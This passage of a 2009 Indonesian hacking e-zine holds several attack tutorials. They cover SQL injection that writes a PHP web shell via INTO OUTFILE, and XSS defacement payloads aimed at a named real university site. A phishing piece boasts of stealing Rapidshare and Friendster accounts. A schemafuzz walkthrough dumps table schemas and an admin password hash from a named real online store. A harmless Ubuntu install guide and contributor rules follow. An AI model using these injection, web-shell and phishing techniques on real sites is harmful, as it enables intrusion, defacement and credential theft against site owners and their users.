- 40- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Ini bisa dijadikan pembelajaran oleh kita semua yg ingin membuat software berbayar, perhatikan
pintu2 yg ada apakah sudah cukup aman??, n untuk para nubie kayak gw, pasti banyak yg bertanya,
Q : Om2, cara jadi hacker tuh gimana seh??
biasanya kita bingung sendiri ngejawabnya,
A : ya loe belajar script, bahasa pemograman, n De EL EL yg pasti bikin org pusing duluan...
Padahal sesuatu pemikiran yg besar ntu asalnya dari yang sederhana dulu, belajarlah selangkah demi
selangkah, step by step, gunakan logika, pasti ada aja kok jalannya, contohnya ya kayak gw ini, udah mikir jauh2
ternyata jawabannya depan mata nyesek kan???
~~~~~~~~~End Of Trick~~~~~~~~~
--^One Step Closer^--
/Nick : EiGhtTaiLz
/Location : Klapanunggal kab. Bogor - Depok
/YM : Ekor_Delapan (jgn lupa di add ya)
/No. HP : PM gw aja....
/Website : Baru belajar bikin, ntar kalo jadi gw kasih tau
Pesen2 ah : �HC : moga eksis selalu, moga eMagaZine tetap bertahan walaupun masih segede toge,
�Member : eksis terus donk, jgn absent mulu, minimal 1 minggu sekali maen ke HC apa
susahnya, mari kita buat HC jadi salah satu forum underground yg terpandang di negeri ini,
�Momod Proyek : Angkat topi deh buat lo Bal,, but jgn lupa artikel gw di muat di vol 1 ya
awas lo kalo kagak, �Poprats : Mane aje lo rats, gimana ngeband kemaren? Sukses g dapet
bini baru? �Jenny : we were made for each other, i`m here forever, I know we were.......
Thx to : � Allah SWT who gave my Brain to thinking...
� My Parents
� My Brother n My Lovely Cat “Sapi”
� My Laptop Toshiba - Pent. 3 - 40gb - 128ram
- 41- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
� X-CODE magazine
� Ryodan Genk : Ajay, Billie Jay, Ebenk, Malique, YuLizt
� Tenro Hakuya n Toke aka chaer.newbie
Dari gue : I.A.M | Ryodan Leader aka EiGhtTaiLz
...:::...Hidup adalah Pilihan...:::...
...:::...yang Kuat kan Bertahan, yang Lemah Berantakan...:::...
...:::...Itulah Kenyataan, sekeras apapun kau tuk Menyangkalnya...:::...
- 42- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Advanced SQL Injection [Test On Windows XP]
Writer : eminem ([email protected])
Di tehnik ini saia akan mencoba melakukan serangan sql injection dan memasang shell di dalam situs dengan menggunakan syntax SQL.
Untuk mengetahui apakah tehnik ini dapad berjalan di sebuat situs adalah dengan memasukan perintah LOAD_FILE(‘/boot.ini’) pada magic number, perintah ini di gunakan pada OS win karena maksud dari perintah ini adalah membuka file boot.ini yang ada di dalam win apabila di linux gunakanlan LOAD_FILE(‘/etc/passwd’) ☺.
Masukanlah perintah tersebut ke dalam magic number sehingga url nya menjadi seperti ini
Nb : apabila magic_quotes_gpc di dalam situs posisi ON anda tinggal merubah ascii ke HEX atau DECIMAL
[lihat gambar di bawah]
- 43- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Untuk perintah HEX :
http://localhost/pentest/index.php?id=-9%20union%20select%201,load_file(0x2F626F6F742E696E69),3,4,5--
untuk perintah DECIMAL:
http://localhost/pentest/index.php?id=-
9%20union%20select%201,load_file(char(47,98,111,111,116,46,105,110,105)),3,4,5--
tapi di sini magic_quotes_gpc dalam posisi OFF jd saia menggunakan perintah ini ☺
http://localhost/Pentest/index.php?id=-9%20union%20select%201, LOAD_FILE(‘/boot.ini’) ,3,4,5—
Bingo ☺ maka file boot.ini yang ada di dalam windows akan terbuka pada browser , ok sekarang kita akan
mencari di mana kah letak dari file index.php situs ini berada, karena saia di sini akan mencoba memasang
shell pada dir -Nya tersebut.
Untuk mencari di mana letak letak directorynya bias lihat file phpinfo.php atau php.ini dan carila file yang
bernama DOCUMENT_ROOT - C:/xampp/htdocs yaps berarti bisa kita artikan bahwa file root terletak di
C:/xampp/htdocs dan file index.php terdapat di C:/xampp/htdocs/Pentest/index.php ☺ ok sekarang coba
masukan perintah LOAD_FILE(‘C :/xampp/htdocs/Pentest/index.php’) sehingga ulr akan menjadi seperti ini
- 44- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
http://localhost/Pentest/index.php?id=-9%20union%20select%201,load_file(%27c:/xampp/htdocs/Pentest/index.php%27),3,4,5--
Ok sudah terlihat,di sini terlihat file index.php dari directory Pentest ☺
sekarang sudah sampai pada saat pemasangan file PHP yang dengan menggunakan perintah ‘<?include($_GET["cmd"]);?>’ yang di isikan pada magic number dan perintah into outfile ‘/xampp/htdocs/Pentest/error.php’ pada akhir guna dari perintah itu adalah membuat file error.php yang
berisikan <?include($_GET["cmd"]);?> ☺ sehingga urlnya seperti ini:
http://localhost/Pentest/index.php?id=-9%20union%20select%201,%27%3C?include($_GET[%22cmd%22]);?%3E%27,3,4,5%20into%20outfile%20%27/xampp/htdocs/Pentest/error.php%27--
☺ kita sudah berhasil membuat file error php dan memasukan bug RFI di dalamnya.
Sekarang coba anda akses shell tersebut dengan memasukan url seperti ini
http://localhost/pentest/error.php?cmd=http://localhost/pentest/shell.txt?
Evilcode = http://localhost/pentest/shell.txt?
Dan lihatlah hasil apa yang anda dapatkan ☺
- 45- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Bingo ☺ sekarang shell sudah tersedia hehehehe..
Thanks to :
Allah Swt.
My mom , My dad & My brother
Mainhack Brotherhood
Serverisdown
- 46- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
XSS Attack Deface Web Tanpa Merusak
Writer : omicron9194 ([email protected])
Cross Site Scripting atau yang lebih dikenal dengan XSS, sudah sangat banyak di bicarakan. XSS ? Apa
itu? XSS adalah suatu cara memasukkan code / script HTML ke dalam suatu web site.Banyak web
programmer yang tidak terlalu memperhatikan bahaya XSS, atau mungkin terlalu banyak kesalahan
penulisan scripting pada halaman web sehingga mengizinkan beberapa karakter tertentu dijalankan
pada situs tersebut.
Untuk lebih memahami XSS,perhatikan contoh berikut :
http://www.petra.ac.id/search/index.php?q=<script>alert(‘xss ditemukan’)</script>
Site di atas mempunyai kelemahan terhadap XSS.Untuk mengetahui apakah suatu site mempunyai
kelemahan XSS,saya tambahkan <script>alert('xss ditemukan')</script> <<< Ini adalah salah satu
script untuk melihat apakah suatu site mempunyai kelemahan XSS atau tidak.
Kembali ke contoh yang di atas,setelah saya memasukkan script tadi,maka akan muncul popup baru
yang berisi xss ditemukan.Nah,dari sini kita mengetahui bahwa site tersebut mempunyai kelemahan
XSS (keluarnya popup tadi).Selanjutnya kita bisa mengexploitasi site tersebut.
Saya coba ini :
- 47- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
http://www.petra.ac.id/search/index.php?q=<h1><marquee><font color=red>omicron9194 was
here</font></marquee></h1>
dan
http://www.petra.ac.id/search/index.php?q=<P ALIGN=center><IFRAME
SRC=http://protection.6te.net width=”777”
height=”1500”></IFRAME></P><h1><marquee>|omicron9194 was here|</marquee></h1>
- 48- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Karena Script HTML yang tadi kita tulis dapat berjalan maka hal ini lah yang disebut dengan XSS. Lalu
apa hanya script HTML saja yang dapat di jalankan? Script yang bisa digunakan untuk XSS adalah
HTML,JavaScript,VBScript,ActiveX,Flash. Kita tadi menggunakan dua script,JavaScript dan HTML.
Dalam XSS ini,ada dua kemungkinan yang pasti,yaitu :
Pertama, script yang kita tambahkan,berjalan di browser kita <<<< Kita berhasil melakukan XSS , jika
kita sudah berhasil menampilkan tulisan,maka terserah temen-temen mau diapakan site tersebut
selama codenya masih bisa utk XSS :p.
Banyak sekali metode XSS yang dapat dilakukan,semua tergantung pada kreativitas masing-
masing.Ternyata,XSS cukup bahaya,mengapa? Melalui XSS,kita bisa mencuri password >>>
document.cookie
Kedua,script yang kita tambahkan tadi,tidak ditampilkan di browser <<<< gagal
Kenapa bisa gagal ?
Yang membuat kita gagal adalah karena situs tersebut sudah di filter, dengan kata lain server tersebut
udah di setting agar tidak melayani permintaan yang mendukung beberapa karakter seperti berikut :
Char ; / ? : @ = & “ #
Code %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23
Char { } | \ ^ ~ [ ] ` % ‘
Code %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27
XSS merupakan pilihan yang menarik bagi newbie yang tidak mempunyai shell ato sploit,karena untuk
melakukan XSS hanya membutuhkan browser!
XSS juga dikatakan oleh temen-temen saya sebagai "just for fun" , why ? Karena untuk melakukan XSS
ini, hanya membutuhkan pengetahuan dasar about HTML. Jadi setiap orang dapat dengan mudah
melakukan XSS ini :D
Mungkin hanya ini saja yang bisa saya jelaskan,semoga artikel ini bermanfaat.
Wassalamualaikum... ☺
Nick : omicron9194
Email : [email protected] atau [email protected]
Website : www.d1gdo.com
- 49- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Phising Attack Pengenalan dan Pencegahannya
Writer : Metropolix ([email protected])
Berasal dari kata “Fishing” yang artinya memancing,sering kali kerap di
gunakan para cracker untuk memperoleh informasi pribadi seperti User
ID, Password,PIN, nomor rekening bank, nomor kartu kredit Anda secara
tidak sah.Dan biasanya data-data tersebut mereka lakukan buat
kepentingan pribadi mereka,tidak banyak juga yg merugikan korban-
korbannya.mereka yg melakukan aksi tersebut biasanya kerap di panggil
dengan sebutan “Phiser”!!! B-)
• Apa saja sih kemampuan yg umum di miliki para phiser ini ?
Sebenarnya tidak di butuhkan keahlian khusus untuk melakukan tehnik phising,atau kemampuan yg
besar untuk menjebol suatu system keamanan computer.phising banyak di lakukan dengan social
engineering, yaitu dengan memanfaatkan kelemahan orang saat mengintepretasikan sebuah
informasi di komputer.
• Bagaimana mereka melakukan tehnik Phising tersebut ?
Contoh phising yg kerap digunakan adalah dengan menggunakan halaman login palsu suatu
website,sehingga para member website tersebut dengan mudah terkecoh dan memasukkan
username dan password account mereka ke dalam form login palsu tersebut,yg tidak lain adalah situs
palsu yg di buat seolah menyerupai aslinya!.Akan tetapi biasanya kelemahan tehnik yg satu ini adalah
dengan dimana kita melihat keanehan pada URL atau LINK website tersebut.
Kita lihat contoh gambar berikut ini :
- 50- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Yup!! Itu adalah contoh phising pada halaman login yahoo.Bisa kita perhatikan perbedaan URL palsu
dan yg asli.He..he…he!
Contoh lain lagi pada Rapidshare:
- 51- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Sudah Jelas bukan,apa keuntungan yg bisa kita ambil dari kerugian orang lain ?! Xixixixixi…..
Saya sendiri dalam melakukan phising terhadap Acc Rapidshare dalam sebulannya bisa menghasilkan
uang sekitar 2 jutaan.
• Seberapa bahayakah phising ini ?
Bisa kamu bayangkan jika yg kita dapatkan adalah sejumblah data informasi kartu credit,no Pin,data
private member,Data penjualan (termasuk gak yah ?? ..wakakaka ),apapun itu.yg jelas phising ini bisa
menimbulakan efek negatife ke korbannya!
Kita lihat saja Belakangan ini phising yg marak terjadi pada situs yg lagi nge trend di kalangan “netters
muda” (lagak gw.. udah kayak paling tua ajah,,Jiakakaka..).Phising pada situs “ FRIENDSTER ”.
Testing saya dalam phising terhadap Friendster ini dalam satu harinya bisa menghasilkan sekitar 40
acc member!! O__O (tapi gak ada yg gw obrak-abrik loh… Cuma sekedar pengen tahu ajah…Xixixixi! )
Ok semuanya ..itu tadi sedikit info mengenai phising dari gw.
Mohon maaf apabila ada kekurangan atau salah kata dalam menuliskan artikel ini.saya sendiri masih
sangat newbie dan membutuhkan bimbingan dari semuanya.. ☺ Just Share And Learn !!!
- 52- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Salam hangat metropolix ~
mailto:[email protected]
thanks to :
[†] Hackers center [†] Balikita [†] Yogyafree [†] Gorontalo defacer [†]
| gblack a.k.a biadabz | blok_underground a.k.a om rizal | bL4Ck_3n91n3 | UnderDos | tukulesto |
| ramz | coco_nakal | agitama a.ka. deathromeo | indomie | okacybernet | mamet tosa |
www.andrea-metropolix.com
- 53- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Bedah Web With Schemafuzz SQL Injection Dengan Metode Schemafuzz
Writer : omicron9194 ([email protected])
Bahan-bahan yg harus disiapkan :
1. Python , donlot di http://www.python.org/ftp/python/2.5/python-2.5.msi
2. Schemafuzz >>> http://darkc0de.com/others/schemafuzz.py
3. CMD
Gunakan CMD , masuk ke folder schemafuzz.py
Dengan perintah >> schemafuzz.py -u "target" --perintah
Utk lebih jelasnya,,langsung ke TKP ,, xixixixixi
1.Cari target ,, ini target kita >>>
http://www.sleeppost.com/viewproduct.php?pid=923
2.Cek columnnya
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" –findcol
maka akan keluar :
- 54- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
===================================================================================
+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--
+] Evasion Used: "+" "--"
+] 09:44:10
-] Proxy Not Given
+] Attempting To find the number of columns...
+] Testing: 0,1,2,3,4,5,6,
+] Column Length is: 7
+] Found null column at column #: 0
+] SQLi URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SEL
CT+0,1,2,3,4,5,6--
+] darkc0de URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION
SELECT+darkc0de,1,2,3,4,5,6
-] Done!
===================================================================================
Nah kita gunakan ini http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6 utk nginject.
3.Cari db nya
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dbs
- 55- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
===================================================================================
[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: [email protected]
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] ??sleeppo_store?
[-] 09:57:00
[-] Total URL Requests 3
[-] Done
===================================================================================
Tuh kan keliatan db nya,, wkwkwkkwk sleeppo_store
4. Cari nama tabel dalam db
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store
Ni yg lengkapnya :
- 56- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
===================================================================================
[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: [email protected]
Version: 5.0.67-log
[+] Showing Tables & Columns from database "sleeppo_store"
[+] Number of Tables: 20
[Database]: sleeppo_store
[Table: Columns]
[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi
n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead
er,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai
l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate
,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,survey,qty
[-] 10:24:51
[-] Total URL Requests 139
[-] Done
===================================================================================
- 57- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Berarti itu site punya 20 tabel,kolomnya juga ada tuh.Tinggal pilih yg mana yg mau di exploit :p
5. Exploit tabel n kolom
===================================================================================
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword
===================================================================================
===================================================================================
[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:36:59
[-] Proxy Not Given
- 58- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: [email protected]
Version: 5.0.67-log
[+] Dumping data from database "sleeppo_store" Table "config"
[+] and Column(s) ['adminlogin', 'adminpassword']
[+] Number of Rows: 3
[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn: : ' onmouseover="inPr
oduct(:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn: )
" onmouseout='outProduct(:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5
c:NoDataInColumn: )'><td width='30%' style='padding:6px' ><a href='./viewproduct
.php?pid=:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn
: '><img src='./images/smalllogo.gif' border='1' style='border-color:#cccccc;z-i
ndex:1'></a></td>
<td width='80%' style='padding-left:20px;padding:6px'><b><a href='./viewproduct.
php?pid=:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
&pv='>3</a></b>
<br><br>5<br /><br /><div style='float:right;background:url(./images/pricetag.gi
f) no-repeat;width:100px;height:42px;margin-top:5px;cursor:pointer' onclick='pri
ceClick(:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c:
[1] No data
[2] No data
[3] No data
[-] 10:37:36
[-] Total URL Requests 5
[-] Done
===================================================================================
Liat tulisan yg saya tebalkan ,,xixixi...itu user ama passnya udah kliatan,,passnya tgl di decrypt aja ;)
Cara diatas berlaku untuk sql versi 5 , utk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n
kolom
ex:
===================================================================================
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --fuzz
===================================================================================
- 59- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Beberapa perintah :
--fuzz >>> mencari nama kolom n tabel pada sql v 4
--schema >>> melihat nama tabel
--dump >>> melihat isi kolom
--findcol >>> menemukan dakc0de ( colom )
Silahkan cari yg laen. Baca aja help nya :p
Semoga bermaanfaat :)
- 60- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Instalasi Ubuntu 8.10 (Intrepid Ibex) Migrasi dari Windows ke Linux
Writer : Equal ([email protected])
#first
Linux Untuk Umat Manusia
"Ubuntu" berasal dari bahasa kuno Afrika, yang berarti "rasa perikemanusian terhadap sesama
manusia". Ubuntu juga bisa berarti "aku adalah aku karena keberadaan kita semua". Tujuan dari
distribusi Linux Ubuntu adalah membawa semangat yang terkandung di dalam Ubuntu ke dalam
dunia perangkat lunak.
Diatas merupakan sedikit synopsis dari OS ini, yah, kita berharap (tidak hanya berharap,tapi juga
bertindak) semoga Linux ini dapat mencapai misi yang telah ditetapkan. Dan alasan saya membahas
tentang OS ini adalah karena saya mengambil Mata Kuliah Sistem Operasi dan pada mata kuliah ini
akan mempunyai Tugas Praktek yang mengharuskan kami menggunakan Linux sebagai sarana
pembelajaran.
Ubuntu versi ini saya download dari http://www.ubuntu-id.org/ubuntu/download, bagi para pembaca
yang mempunyai bandwith yang sangat lebar dapat langsung mendownload pada link mirror yang
telah disediakan. Sedangkan bagi anda yang tidak dapat mendownload langsung Ubuntu mempunyai
Program pengiriman CD gratis yang dapat anda lihat syarat – syaratnya di sini http://www.ubuntu-
id.org/ubuntu/shipit .
#keterangan hardware
1. Monitor 17”
2. 1 buah PC dengan spesifikasi
3. Prosesor Intel Dual Core 1,66 GHz
4. HDD 160 GB
5. VGA 128 MB
6. RAM 1024 MB
7. DVD-RAM
#keterangan software
Untuk memasang Ubuntu ini pada computer saya menggunakan Virtual Machine yang berjalan diatas
OS Windows XP Profesional Service Pack 3 (fully updated) yaitu Sun xVM Virtual Box yang bisa anda
download di http://www.virtualbox.org/wiki/Downloads.
- 61- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Mungkin ada pertanyaan kenapa menggunakan Virtual Machine tidak langsung diinstal saja pada PC
tersebut?
Pertama alasan saya menggunakan ini adalah :
1. Lebih mempermudah dalam pengetesan OS (bug,crash,error,dll)
2. Lebih hemat dalam penggunaan hardware
3. Tidak mengganggu Host OS jadi Linux hanya bertindak sebagai Guest OS (tidak berhubungan
sama sekali dengan OS yang digunakan yaitu Windows XP SP3.
#instalasi
Dalam penginstalan Ubuntu ini hanya mempunyai beberapa step/ langkah – langkah yang harus
dilakukan, dan saya jamin langkah - langkah itu tidak lebih dari 15 langkah. ☺
1. Masukkan Live CD Ubuntu 8.10 anda kedalam drive cd-rom, sebelumnya anda harus merubah
boot order agar computer anda memboot melalui cd-rom.
2. Akan keluar tampilan awal dibagian ini anda diminta memilih bahas yang akan digunakan,
disini saya memilih bahasa default yaitu English.
3. Kemudian akan keluar beberapa pilihan,saya akan memilih pilihan a.
a. Try Ubuntu without change to your computer
b. Instal Ubuntu
Tunggu sampai loading selesai, setelah selesai anda akan sampai di halaman desktop ubuntu
4. Dihalaman awal ini ada icon yang bertuliskan install, klik 2x pada icon tersebut.
5. Sampai keluar windownya akan ada 7 step yang harus dilewati untuk menginstal ubuntu ini
pada computer anda.
a. Pada step ini anda diminta bahasa yang ingin anda gunakan pada ubuntu anda, pada
step ini saya memilih bahasa inggris. Setelah bahasa yang diinginkan terpilih, klik
forward (Alt + F).
b. Di step ini anda diminta memilih region/wilayah tempat tinggal anda, pada step ini
saya memilih Jakarta – Indonesia, kemudian klik forward.
c. Di step ke-3 ini anda akan diminta memilih layout/tampilan dari keyboard anda, disini
saya sarankan menggunakan layout dari USA yang sudah merupakan standard yang
digunakan pada hampir semua keyboard yang ada di Indonesia. Setelah selesai memilih
klik forward kembali.
d. Pada window ini anda diminta untuk memilih bagaimana pembagian hdd anda untuk
tempat penginstalan ubuntu ini. Pada step ini ada 2 pilhan yang bisa dipilih, yaitu :
- 62- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
• Guided – use entire disk
Pada opsi ini anda akan dituntun seluruhnya dalam pembagian hdd anda.
• Manual
Dan pada opsi ini anda secara manual dalam pembagian hdd anda. (hanya
disarankan bagi anda yang sudah cukup mengerti seluk beluk linux). Karena
apabila salah dalam mengatur pembagian hdd anda dapat mengakibatkan
kehilangan data penting yang berada pada hdd anda.
e. Disini saya asumsikan anda memilih opsi Guided – use entire disk – klik forward.
Setelah memilih anda akan langsung dihadapkan pada beberapa kotak yang wajib anda
isi, yaitu :
• What is your name?
Kotak ini meminta anda memasukkan nama yang ingin anda gunakan sebagai
identitas didalam computer nanti. Disini saya menggunakan nama Equal.
• What name do you want to use to log in?
Kotak ini meminta anda memasukkan nama yang akan digunakan untuk
username anda nantinya, untuk log in. disini saya juga menggunakan nama
Equal (dalam huruf kecil)
• Choose a password to keep your account safe
Anda diminta memasukkan password yang akan digunakan untuk username
yang telah anda pilih (anda wajib memasukkan password). Pada kotak in anda
wajib memasukkan 2x password yang anda pilih, untuk memastikan anda
mengingat dengan baik password yang anda masukkan. Pada bagian ini saya
menggunakan password equalisme
• What the name of this computer
Disini anda diminta memasukkan nama dari computer yang akan anda gunakan.
Saya menggunakan nama vbox.
Terakhir pada step ini ada sebuah check box (Log in automatically) yang apabila anda
men-check checkbox ini maka ubuntu akan mengingat username dan password anda
(yang sangat tidak saya sarankan, berkaitan dengan hal security).
f. Ini merupakan step terakhir dari penginstalan ubuntu 8.10 pada computer anda, pada
step ini anda wajib memeriksa kembali semua pilihan anda dengan membaca laporan
dari semua setting-an yang telah anda pilih. Setelah semua sesuai dengan yang anda
inginkan maka tekan pilihan Install. Silahkan ditunggu sampai proses dari penginstalan
ini selesai.
- 63- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
g. Setelah selesai maka akan muncul sebuah window yang menginformasikan bahwa
instalasi ubuntu ini telah selesai. Dan pada jendela ini aka nada 2 pilihan yaitu tetap
melanjutkan menggunakan live cd (continue using live cd) atau me-restart computer
anda agar dapat langsung menggunakan ubuntu yang telah di instal tadi (restart now).
Disini saya memilih agar ubuntu langsung merestart dirinya, klik Restart now.
#last
Demikian tutorial saya tentang cara menginstal ubuntu 8.10 ini, masih banyak hal – hal teknik yang
belum dibahas dalam tutorial ini. Dan apabila ada kesalahan di dalam tutorial ini (dan saya yakin pasti
ada) mohon mengirimkan kritik dan saran ke [email protected]. Terakhir saya ucapkan
terimakasih karena anda telah berkenan membaca tutorial dari saya ini. Salam Equal
#shout & greets
• Teman – teman di Himpunan Mahasiswa Teknik Perangkat Lunak (HMPL)
• TPL Angkatan 2008 terutama Boedas Team.
• [saran & kritik] email me at : [email protected] atau ke web Equal
• [about me] mahasiswa disebuah perguruan tinggi, moderator di forum.hackers-center.org,
administrator di forum.sman2palangkaraya.com, dan manusia biasa yang pasti mempunyai
banyak kelemahan serta kekurangan ☺.
- 64- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
HC eMagazine Writer Ketentuan Menjadi Penulis HC eMagazine
Berminat menjadi penulis di HC eMagazine edisi berikutnya? Apabila anda berminat
jangan ragu-ragu untuk mengirimkan artikel anda ke redaksi HC eMagazine. Artikel
harus asli tulisan anda, kalaupun itu bukan buatan anda harus mencantumkan sumber
asli anda mendapatkan artikel tersebut. silahkan kirim artikel anda dengan ketentuan
sebagai berikut :
Materi yang ditentukan :
• Kategori Komputer & Internet
• Kategori Pemograman / Coding
• Kategori Hacking & Cracking
• Kategori Phising & Phreaking
• Kategori Handphone
Kirimkan tulisan anda dengan format :
• Format File : .doc
• Page Setup : Paper size = Letter atau A4
• Line spacing : single
• Font : Arial atau Calibri, size 12
Kirimkan tulisan ke Redaksi HC eMagazine :
Subject : HC eMagazine <judul tutorial>
Attachment : JudulTutorAnda.zip atau JudulTutorAnda.rar (pilih salah satu saja).
Tidak menerima file download di ziddu, rapidshare, 4shared, dll. (jika ukurannya besar di perbolehkan
disimpan di hosting seperti ripway, fileAve, Geocities, dll)
Artikel akan diseleksi. Jika sesuai dengan kriteria, maka akan kami publish di HC eMagazine edisi
berikutnya. Redaksi HC berhak mengedit isi tulisan sesuai kebutuhan.
Terima kasih.
Redaksi HC eMagazine
- 65- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
Lampiran : Serba – Serbi HC eMagazine
Logo-Logo Hackers-Center
- 66- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
- 67- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
- 68- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
- 69- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01
- 70- HC eMagazine – Spirit # 01
Hackers-Center © 2009 – HC eMagazine Vol. 01